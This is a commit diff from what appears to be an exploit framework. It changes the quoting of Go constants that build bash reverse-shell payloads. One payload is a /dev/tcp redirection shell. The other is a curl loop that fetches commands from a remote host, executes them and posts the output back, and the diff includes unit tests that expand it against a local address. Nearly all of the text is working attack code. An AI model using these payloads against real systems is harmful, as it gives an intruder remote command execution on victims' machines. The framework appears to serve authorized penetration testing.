Switch HTTP bash loop to double quotes for consistent nesting

terrorbyte · terrorbyte · commit 3114f0ba03bc · 2025-07-08T08:59:08.000-06:00
diff --git a/payload/reverse/bash.go b/payload/reverse/bash.go
@@ -7,7 +7,7 @@ import (
 const (
 	BashDefault        = BashTCPRedirection
 	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
-	BashHTTPShellLoop  = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H'VC-Auth: %s' %s://%s:%d || exit)")" %s-H'VC-Auth: %s' %s://%s:%d/rx ||exit;sleep 1;done'`
+	BashHTTPShellLoop  = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d || exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx ||exit;sleep 1;done'`
 )
 
 // The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
diff --git a/payload/reverse/reverse_test.go b/payload/reverse/reverse_test.go
@@ -27,13 +27,13 @@ func TestBashDefault(t *testing.T) {
 func TestBashHTTPShellLoop(t *testing.T) {
 	payload := reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, true, "vulncheck")
 
-	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H'VC-Auth: vulncheck' https://127.0.0.1:4444 || exit)")" -k -H'VC-Auth: vulncheck' https://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444 || exit)")" -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
 		t.Fatal(payload)
 	}
 
 	payload = reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, false, "vulncheck")
 
-	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H'VC-Auth: vulncheck' http://127.0.0.1:4444 || exit)")" -H'VC-Auth: vulncheck' http://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H"VC-Auth: vulncheck" http://127.0.0.1:4444 || exit)")" -H"VC-Auth: vulncheck" http://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
 		t.Fatal(payload)
 	}
 

Original file line number	Diff line number	Diff line change
`@@ -7,7 +7,7 @@ import (`
`7`	`7`	`const (`
`8`	`8`	`BashDefault = BashTCPRedirection`
`9`	`9`	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
`10`		- BashHTTPShellLoop = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H'VC-Auth: %s' %s://%s:%d \|\| exit)")" %s-H'VC-Auth: %s' %s://%s:%d/rx \|\|exit;sleep 1;done'`
	`10`	+ BashHTTPShellLoop = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d \|\| exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx \|\|exit;sleep 1;done'`
`11`	`11`	`)`
`12`	`12`
`13`	`13`	`// The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.`
Original file line number	Diff line number	Diff line change
`@@ -27,13 +27,13 @@ func TestBashDefault(t *testing.T) {`
`27`	`27`	`func TestBashHTTPShellLoop(t *testing.T) {`
`28`	`28`	`payload := reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, true, "vulncheck")`
`29`	`29`
`30`		- if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H'VC-Auth: vulncheck' https://127.0.0.1:4444 \|\| exit)")" -k -H'VC-Auth: vulncheck' https://127.0.0.1:4444/rx \|\|exit;sleep 1;done'` {
	`30`	+ if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444 \|\| exit)")" -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444/rx \|\|exit;sleep 1;done'` {
`31`	`31`	`t.Fatal(payload)`
`32`	`32`	`}`
`33`	`33`
`34`	`34`	`payload = reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, false, "vulncheck")`
`35`	`35`
`36`		- if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H'VC-Auth: vulncheck' http://127.0.0.1:4444 \|\| exit)")" -H'VC-Auth: vulncheck' http://127.0.0.1:4444/rx \|\|exit;sleep 1;done'` {
	`36`	+ if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H"VC-Auth: vulncheck" http://127.0.0.1:4444 \|\| exit)")" -H"VC-Auth: vulncheck" http://127.0.0.1:4444/rx \|\|exit;sleep 1;done'` {
`37`	`37`	`t.Fatal(payload)`
`38`	`38`	`}`
`39`	`39`